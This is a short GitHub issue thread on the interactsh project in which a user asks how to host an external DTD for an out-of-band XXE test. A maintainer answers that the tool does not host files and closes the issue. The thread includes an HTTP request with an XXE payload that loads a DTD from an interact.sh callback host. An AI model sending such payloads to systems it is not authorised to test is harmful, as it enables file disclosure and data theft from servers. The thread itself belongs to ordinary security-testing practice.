### ISSUE TITLE
How To Configure Interactsh To Read Files From My PC If I Am Installing Interctsh Client ?

### ISSUE THREAD

**Issue by 0xAwali** [projectdiscovery/interactsh#34]
### I Am Using Interactsh Client To Test XXE 

```
POST / HTTP/1.1
Host: company.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://ID.interact.sh/file.dtd">
<root>
      <email>&pwnfromME;</email>
      <password>*********</password>
</root>
```
### So How Can Configure Interactsh Client To Read file.dtd

**Comment by ehsandeep** [comment]
@0xAwali this is something being discussed on - https://github.com/projectdiscovery/interactsh/issues/29, in current form, interactsh can be only used for Interactions and not for file hosting.

Closing this as we can continue the discussion on the linked GH issue.
